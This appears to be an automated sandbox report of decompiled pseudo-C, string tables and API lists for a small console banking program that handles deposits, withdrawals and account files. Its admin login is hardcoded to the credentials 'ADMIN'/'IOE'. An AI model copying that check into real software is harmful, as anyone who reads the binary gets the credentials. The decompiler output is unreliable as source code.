                                                						switch( *((intOrPtr*)(_v16 * 4 +  &M01233A88))) {
                                                							case 0:
                                                								E01233DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                								goto L35;
                                                							case 1:
                                                								__eax = E01234640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 2:
                                                								__eax = E012349E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 3:
                                                								__eax = E01234E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                								goto L35;
                                                							case 4:
                                                								__eax = E01235600(__ebx, __ecx, __eflags, __fp0);
                                                								goto L35;
                                                							case 5:
                                                								__eax = E01236190(__ebx, __ecx, __edx, __fp0);
                                                								goto L35;
                                                							case 6:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to Log out? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__ecx = _v5;
                                                								__eflags = __ecx - 0x59;
                                                								if(__eflags == 0) {
                                                									L28:
                                                									_t40 =  &_v36; // -15
                                                									_t40 = E01238417(__eflags, _t40);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t41 =  &_v36; // -15
                                                									__ecx = _t41;
                                                									_push(_t41);
                                                									_t42 =  &_v80; // -59
                                                									__edx = _t42;
                                                									_push(_t42);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__eax =  *0x1252f28; // 0x0
                                                									_push(__eax);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E01233610(__ebx, __edi, __esi, __fp0);
                                                								} else {
                                                									__edx = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L28;
                                                									}
                                                								}
                                                								goto L35;
                                                							case 7:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0) = E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(__eflags == 0) {
                                                									L32:
                                                									_t45 =  &_v36; // -15
                                                									__ecx = _t45;
                                                									__eax = E01238417(__eflags, _t45);
                                                									 *0x1252f28 = E01236EF1("LOG.DAT", "a");
                                                									_t46 =  &_v36; // -15
                                                									__edx = _t46;
                                                									_push(_t46);
                                                									_t47 =  &_v80; // -59
                                                									__eax = _t47;
                                                									_push(_t47);
                                                									_push(0x1252f40);
                                                									_push(0x1252ee0);
                                                									_push("%s %s %s %s\n");
                                                									__ecx =  *0x1252f28; // 0x0
                                                									_push(__ecx);
                                                									__eax = E01236F06(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 0x18;
                                                									__edx =  *0x1252f28; // 0x0
                                                									_push(__edx);
                                                									__eax = E01236DB6(__ebx, __edi, __esi, __eflags);
                                                									__esp = __esp + 4;
                                                									__eax = E012377B1(0);
                                                								} else {
                                                									__eax = _v5;
                                                									__eflags = _v5 - 0x79;
                                                									if(__eflags == 0) {
                                                										goto L32;
                                                									}
                                                								}
                                                								goto L35;
                                                						}
                                                					}
                                                					L35:
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return 1;
                                                			}

                                                APIs
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01233667
                                                • _wprintf.LIBCMT ref: 0123367D
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123368F
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                • _wprintf.LIBCMT ref: 012336A5
                                                  • Part of subcall function 012312F0: _wprintf.LIBCMT ref: 01231329
                                                • _wprintf.LIBCMT ref: 012336D8
                                                • _wprintf.LIBCMT ref: 01233863
                                                • _wprintf.LIBCMT ref: 01233879
                                                • _wprintf.LIBCMT ref: 012338A7
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E21
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E54
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233E6C
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E80
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233E94
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233EAA
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EBB
                                                  • Part of subcall function 01233DE0: _wprintf.LIBCMT ref: 01233ED1
                                                  • Part of subcall function 01233DE0: _wscanf.LIBCMT ref: 01233EE2
                                                • _wprintf.LIBCMT ref: 012338BF
                                                • _wprintf.LIBCMT ref: 012336EE
                                                  • Part of subcall function 012377B1: _doexit.LIBCMT ref: 012377BB
                                                • _swscanf.LIBCMT ref: 01233735
                                                • _wprintf.LIBCMT ref: 012337A2
                                                • __wstrtime.LIBCMT ref: 012337BF
                                                • _wprintf.LIBCMT ref: 012337DF
                                                • _wprintf.LIBCMT ref: 012337F5
                                                • _wprintf.LIBCMT ref: 0123380B
                                                • _wprintf.LIBCMT ref: 01233821
                                                • _wprintf.LIBCMT ref: 01233837
                                                • _wprintf.LIBCMT ref: 0123384D
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                • API String ID: 1611355571-1720101819
                                                • Opcode ID: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction ID: c97e78d35ff57704f51b266a57c2891e41bfbc009934773b4c93d9347c0e3cb9
                                                • Opcode Fuzzy Hash: 7d4ece58a05335a514650151b2cc820101cead5f33927ff34e9b8fa5ad783810
                                                • Instruction Fuzzy Hash: 4FA1B4F2EB4307ABEB15FBE49D43BBE76606BE1B10F004128E945752C0E9B1A2584767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E012349E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				char _v5;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				char _v28;
                                                				char _v32;
                                                				char _v36;
                                                				char _v40;
                                                				char _v42;
                                                				char _v62;
                                                				char _v112;
                                                				char _v113;
                                                				char _v125;
                                                				char _v140;
                                                				char _v170;
                                                				char _v200;
                                                				char _v208;
                                                				char _v244;
                                                				char _v324;
                                                				char _v376;
                                                				char _v456;
                                                				void* __ebp;
                                                				intOrPtr _t64;
                                                				intOrPtr _t70;
                                                				intOrPtr _t75;
                                                				void* _t76;
                                                				intOrPtr _t77;
                                                				void* _t81;
                                                				char _t97;
                                                				intOrPtr _t99;
                                                				void* _t104;
                                                				intOrPtr _t105;
                                                				intOrPtr _t110;
                                                				void* _t117;
                                                				void* _t122;
                                                				void* _t127;
                                                				intOrPtr _t147;
                                                				intOrPtr _t148;
                                                				intOrPtr _t168;
                                                				intOrPtr _t173;
                                                				void* _t177;
                                                				void* _t180;
                                                				void* _t184;
                                                				void* _t185;
                                                				void* _t193;
                                                				void* _t195;
                                                				void* _t196;
                                                				void* _t205;
                                                
                                                				_t215 = __fp0;
                                                				_t176 = __esi;
                                                				_t175 = __edi;
                                                				_t132 = __ecx;
                                                				_t131 = __ebx;
                                                				_v16 = 0;
                                                				E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                				E012312B0(5, 0xa);
                                                				_push("Withdraw from A/C number          : ");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E0123738B("%s",  &_v28);
                                                				_t64 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t180 = _t177 + 0x14;
                                                				 *0x1252f28 = _t64;
                                                				_t214 = _v16;
                                                				if(_v16 == 0) {
                                                					E012320E0(_t132, __edi, __esi, _t214, __fp0);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Given A/C number does not exits!");
                                                					return E0123715C(__ebx, _t175, _t176, _t214);
                                                				}
                                                				E012312B0(0x32, 0xa);
                                                				_push( &_v376);
                                                				_push("[ %s ]");
                                                				E0123715C(__ebx, __edi, __esi, __eflags);
                                                				E012312B0(5, 0xc);
                                                				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                				E0123715C(__ebx, _t175, _t176, __eflags);
                                                				E0123738B("%f",  &_v12);
                                                				_t70 = E01236EF1("ACCOUNT.DAT", "r");
                                                				_t184 = _t180 + 0x1c;
                                                				 *0x1252f28 = _t70;
                                                				_v16 = 0;
                                                				while(1) {
                                                					_push( &_v32);
                                                					_push( &_v36);
                                                					_push( &_v40);
                                                					_push( &_v42);
                                                					_push( &_v140);
                                                					_push( &_v113);
                                                					_push( &_v62);
                                                					_push( &_v112);
                                                					_push( &_v125);
                                                					_push( &_v170);
                                                					_push( &_v200);
                                                					_t75 =  *0x1252f28; // 0x0
                                                					_t76 = E01237021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                					_t185 = _t184 + 0x38;
                                                					__eflags = _t76 - 0xffffffff;
                                                					if(__eflags == 0) {
                                                						break;
                                                					}
                                                					_t122 = E01238230( &_v208,  &_v28);
                                                					_t184 = _t185 + 8;
                                                					__eflags = _t122;
                                                					if(__eflags == 0) {
                                                						asm("movss xmm0, [ebp-0x8]");
                                                						asm("comiss xmm0, [ebp-0x1c]");
                                                						if(__eflags > 0) {
                                                							E012320E0( &_v28, _t175, _t176, __eflags, _t215);
                                                							E012312B0(0x14, 0xc);
                                                							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                							asm("movsd [esp], xmm0");
                                                							_push("Sorry, the current balance is Rs. %.2f only!");
                                                							E0123715C(_t131, _t175, _t176, __eflags);
                                                							E012312B0(0x19, 0xe);
                                                							_push("Transaction NOT completed!");
                                                							_t127 = E0123715C(_t131, _t175, _t176, __eflags);
                                                							_v16 = 1;
                                                							return _t127;
                                                						}
                                                					}
                                                				}
                                                				_t77 =  *0x1252f28; // 0x0
                                                				_push(_t77);
                                                				E01236DB6(_t131, _t175, _t176, __eflags);
                                                				E012320E0( &_v200, _t175, _t176, __eflags, _t215);
                                                				E012312B0(0x1e, 0xa);
                                                				_push("Confirm Transaction");
                                                				_t81 = E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("movss xmm0, [ebp-0x8]");
                                                				asm("movss [esp], xmm0");
                                                				E01231870(_t81,  &_v244);
                                                				E012312B0(3, 0xc);
                                                				_push( &_v376);
                                                				_push( &_v28);
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                				asm("movsd [esp], xmm0");
                                                				E01231B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                				E01238140( &_v324,  &_v456);
                                                				E01238140( &_v324, "]");
                                                				E012312B0(0x28 - (E012382C0( &_v324) >> 1), 0xe);
                                                				_push( &_v324);
                                                				E01237229(_t131, _t175, _t176, __eflags);
                                                				E012312B0(8, 0x11);
                                                				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                				E0123715C(_t131, _t175, _t176, __eflags);
                                                				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                				_t97 = _v5;
                                                				__eflags = _t97 - 0x59;
                                                				if(_t97 == 0x59) {
                                                					L10:
                                                					 *0x1252f28 = E01236EF1("ACCOUNT.DAT", "r");
                                                					_t99 = E01236EF1("TEMP.DAT", "w");
                                                					_t195 = _t193 + 0x10;
                                                					 *0x1252f24 = _t99;
                                                					_v16 = 0;
                                                					while(1) {
                                                						_push( &_v32);
                                                						_push( &_v36);
                                                						_push( &_v40);
                                                						_push( &_v42);
                                                						_push( &_v140);
                                                						_push( &_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_t168 =  *0x1252f28; // 0x0
                                                						_t104 = E01237021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                						_t196 = _t195 + 0x38;
                                                						__eflags = _t104 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							break;
                                                						}
                                                						_t117 = E01238230( &_v208,  &_v28);
                                                						_t205 = _t196 + 8;
                                                						__eflags = _t117;
                                                						if(__eflags == 0) {
                                                							asm("movss xmm0, [ebp-0x24]");
                                                							asm("subss xmm0, [ebp-0x8]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [0x1248210]");
                                                						asm("comiss xmm0, [ebp-0x24]");
                                                						if(__eflags > 0) {
                                                							asm("movss xmm0, [ebp-0x20]");
                                                							asm("addss xmm0, [ebp-0x24]");
                                                							asm("movss [ebp-0x20], xmm0");
                                                							asm("movss xmm0, [0x1248210]");
                                                							asm("movss [ebp-0x24], xmm0");
                                                						}
                                                						asm("movss xmm0, [ebp-0x24]");
                                                						asm("addss xmm0, [ebp-0x20]");
                                                						asm("movss [ebp-0x1c], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                						asm("movsd [esp], xmm0");
                                                						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                						asm("movsd [esp], xmm0");
                                                						_push(_v42);
                                                						_push( &_v140);
                                                						_push(_v113);
                                                						_push( &_v62);
                                                						_push( &_v112);
                                                						_push( &_v125);
                                                						_push( &_v170);
                                                						_push( &_v200);
                                                						_push( &_v208);
                                                						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                						_t173 =  *0x1252f24; // 0x0
                                                						_push(_t173);
                                                						E01236F06(_t131, _t175, _t176, __eflags);
                                                						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                					}
                                                					_t105 =  *0x1252f24; // 0x0
                                                					_push(_t105);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					_t147 =  *0x1252f28; // 0x0
                                                					_push(_t147);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					 *0x1252f28 = E01236EF1("TRANSACTION.DAT", "a");
                                                					E01238417(__eflags, 0x1252f30);
                                                					_push(0x1252ee4);
                                                					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                					asm("movsd [esp], xmm0");
                                                					_push(0x1252f30);
                                                					_push(0x1252f40);
                                                					_push("Cash+Withdrawn");
                                                					_push( &_v28);
                                                					_push("%s %s %s %s %.2f %s\n");
                                                					_t110 =  *0x1252f28; // 0x0
                                                					_push(_t110);
                                                					E01236F06(_t131, _t175, _t176, __eflags);
                                                					_t148 =  *0x1252f28; // 0x0
                                                					_push(_t148);
                                                					E01236DB6(_t131, _t175, _t176, __eflags);
                                                					E012320E0(_t148, _t175, _t176, __eflags, _t215);
                                                					E012312B0(0x14, 0xc);
                                                					_push("Transaction completed successfully!");
                                                					return E0123715C(_t131, _t175, _t176, __eflags);
                                                				}
                                                				__eflags = _v5 - 0x79;
                                                				if(_v5 == 0x79) {
                                                					goto L10;
                                                				}
                                                				return _t97;
                                                			}


                                                APIs
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012320FF
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123213E
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 0123215F
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 0123216C
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232188
                                                  • Part of subcall function 012320E0: __wstrtime.LIBCMT ref: 01232195
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 012321C8
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01234A03
                                                • _wscanf.LIBCMT ref: 01234A14
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _wprintf.LIBCMT ref: 01234A4C
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 01234A6E
                                                • _wprintf.LIBCMT ref: 01234A84
                                                • _wscanf.LIBCMT ref: 01234A95
                                                • _swscanf.LIBCMT ref: 01234B02
                                                • _wprintf.LIBCMT ref: 01234B51
                                                • _wprintf.LIBCMT ref: 01234B67
                                                  • Part of subcall function 012320E0: _wprintf.LIBCMT ref: 01232152
                                                Strings
                                                • Given A/C number does not exits!, xrefs: 01234A47
                                                • TEMP.DAT, xrefs: 01234C9E
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234CF3
                                                • %s %s %s %s %.2f %s, xrefs: 01234E47
                                                • Transaction completed successfully!, xrefs: 01234E77
                                                • [ %s ], xrefs: 01234A69
                                                • Cash+Withdrawn, xrefs: 01234E3E
                                                • %s to be Withdrawn from A/C number : %s [%s], xrefs: 01234BD7
                                                • ACCOUNT.DAT, xrefs: 01234AA2
                                                • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 01234C5F
                                                • Confirm Transaction, xrefs: 01234B9C
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01234DC8
                                                • Transaction NOT completed!, xrefs: 01234B62
                                                • Sorry, the current balance is Rs. %.2f only!, xrefs: 01234B4C
                                                • ACCOUNT.DAT, xrefs: 01234C87
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01234AF7
                                                • Withdraw from A/C number : , xrefs: 012349FE
                                                • TRANSACTION.DAT, xrefs: 01234E03
                                                • ACCOUNT.DAT, xrefs: 01234A21
                                                • Amount to be Withdrawn (in NRs.) : , xrefs: 01234A7F
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                                • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                                • API String ID: 427838879-2716176803
                                                • Opcode ID: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction ID: 6f04040dea22da68e6e4612a78f6d78f5b95c4a31de6082b418889cb45a8feed
                                                • Opcode Fuzzy Hash: 79218169a1df4c539761c6bb264ff5ddd538448768600a6b1ea9dac949829136
                                                • Instruction Fuzzy Hash: 5EC1B8F2D3020AABDB11EBE5DC81EEEB778AFA9700F044259F50576080F67066488FB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E012322F0(void* __edi, void* __esi, void* __fp0) {
                                                				char _v5;
                                                				char _v6;
                                                				signed int _v12;
                                                				intOrPtr _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v31;
                                                				char _v35;
                                                				char _v39;
                                                				char _v43;
                                                				char _v47;
                                                				char _v51;
                                                				char _v55;
                                                				char _v59;
                                                				char _v60;
                                                				char _v92;
                                                				void* __ebp;
                                                				void* _t50;
                                                				void* _t74;
                                                				void* _t78;
                                                				void* _t85;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                				void* _t100;
                                                				void* _t101;
                                                				void* _t106;
                                                				void* _t116;
                                                
                                                				_t116 = __fp0;
                                                				_t95 = __esi;
                                                				_t94 = __edi;
                                                				_v60 = 0;
                                                				_v59 = 0;
                                                				_v55 = 0;
                                                				_v51 = 0;
                                                				_v47 = 0;
                                                				_v43 = 0;
                                                				_v39 = 0;
                                                				_v35 = 0;
                                                				_v31 = 0;
                                                				_v20 = 0;
                                                				_v16 = 0;
                                                				do {
                                                					_v20 = 0;
                                                					E012312B0(7, 5);
                                                					_push("Only THREE attempts shall be allowed to enter username and password.");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E01231380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
                                                					E012312B0(0x17, 0xa);
                                                					_push("Enter User name : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					E0123738B("%s",  &_v92);
                                                					E012312B0(0x17, 0xc);
                                                					_push("Password        : ");
                                                					E0123715C(_t85, _t94, _t95, 0);
                                                					_t100 = _t96 + 0x14;
                                                					E012312F0(_t94, _t95,  &_v60);
                                                					_v16 = _v16 + 1;
                                                					_t110 = _v16 - 3;
                                                					if(_v16 == 3) {
                                                						E012320E0( &_v92, _t94, _t95, _t110, _t116);
                                                						E012312B0(0x19, 8);
                                                						_push(0x124f224);
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						E012312B0(0x16, 0xb);
                                                						_push("Press any key to exit the program...");
                                                						E0123715C(_t85, _t94, _t95, _t110);
                                                						_t100 = _t100 + 8;
                                                						E012377B1(0);
                                                					}
                                                					_t87 =  &_v92;
                                                					_t50 = E01238230( &_v92, "ADMIN");
                                                					_t101 = _t100 + 8;
                                                					if(_t50 != 0) {
                                                						L6:
                                                						E012320E0(_t87, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0x19, 0xa);
                                                						_push(0x124f278);
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t101 + 4;
                                                					} else {
                                                						_t78 = E01238230( &_v60, "IOE");
                                                						_t101 = _t101 + 8;
                                                						if(_t78 != 0) {
                                                							goto L6;
                                                						} else {
                                                							_v20 = 1;
                                                						}
                                                					}
                                                					_t113 = _v20 - 1;
                                                				} while (_v20 != 1);
                                                				do {
                                                					E012320E0(_t87, _t94, _t95, _t113, _t116);
                                                					E012312B0(0x1e, 8);
                                                					_push("1. Add User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xa);
                                                					_push("2. Delete User");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xc);
                                                					_push("3. Edit User name / Password");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0xe);
                                                					_push("4. View User Log");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					E012312B0(0x1e, 0x10);
                                                					_push("5. Exit");
                                                					E0123715C(_t85, _t94, _t95, _t113);
                                                					_t106 = _t96 + 0x14;
                                                					E012312B0(1, 0x11);
                                                					_v24 = 0;
                                                					while(1) {
                                                						_t114 = _v24 - 0x4e;
                                                						if(_v24 >= 0x4e) {
                                                							break;
                                                						}
                                                						_push("_");
                                                						E0123715C(_t85, _t94, _t95, _t114);
                                                						_t106 = _t106 + 4;
                                                						_v24 = _v24 + 1;
                                                					}
                                                					E012312B0(0x17, 0x13);
                                                					_push(" Press a number between the range [1 -5]  ");
                                                					E0123715C(_t85, _t94, _t95, __eflags);
                                                					_t96 = _t106 + 4;
                                                					_t89 = _v6 - 0x30;
                                                					_v28 = _v6 - 0x30;
                                                					_v12 = _v28;
                                                					_v12 = _v12 - 1;
                                                					__eflags = _v12 - 4;
                                                					if(__eflags > 0) {
                                                						E012320E0(_t89, _t94, _t95, __eflags, _t116);
                                                						E012312B0(0xa, 0xa);
                                                						_push("Your input is out of range! Enter a choice between 1 to 5!");
                                                						E0123715C(_t85, _t94, _t95, __eflags);
                                                						E012312B0(0xf, 0xc);
                                                						_push("Press ENTER to return to main menu...");
                                                						_t74 = E0123715C(_t85, _t94, _t95, __eflags);
                                                						_t96 = _t96 + 8;
                                                					} else {
                                                						switch( *((intOrPtr*)(_v12 * 4 +  &M012325A8))) {
                                                							case 0:
                                                								_t74 = E012325C0(_t85, _t94, _t95, _t116);
                                                								goto L23;
                                                							case 1:
                                                								E01232800(__ebx, __ecx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 2:
                                                								E01232B10(__ebx, __edi, __esi, __fp0);
                                                								goto L23;
                                                							case 3:
                                                								E01232E80(__ebx, __edx, __eflags, __fp0);
                                                								goto L23;
                                                							case 4:
                                                								E012320E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                								E012312B0(0xf, 0xa);
                                                								_push("Are you sure you want to exit? <Y/N> : ");
                                                								E0123715C(__ebx, __edi, __esi, __eflags);
                                                								__esp = __esp + 4;
                                                								__edx = _v5;
                                                								__eflags = _v5 - 0x59;
                                                								if(_v5 == 0x59) {
                                                									L20:
                                                									E012377B1(0);
                                                								} else {
                                                									__eflags = _v5 - 0x79;
                                                									if(_v5 == 0x79) {
                                                										goto L20;
                                                									}
                                                								}
                                                								goto L23;
                                                						}
                                                					}
                                                					L23:
                                                					_t87 = 1;
                                                					__eflags = 1;
                                                				} while (1 != 0);
                                                				return _t74;
                                                			}

































                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 01232337
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 0123139D
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 012313FC
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231470
                                                  • Part of subcall function 01231380: _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 0123235A
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wscanf.LIBCMT ref: 0123236B
                                                  • Part of subcall function 0123738B: _vwscanf.LIBCMT ref: 0123739C
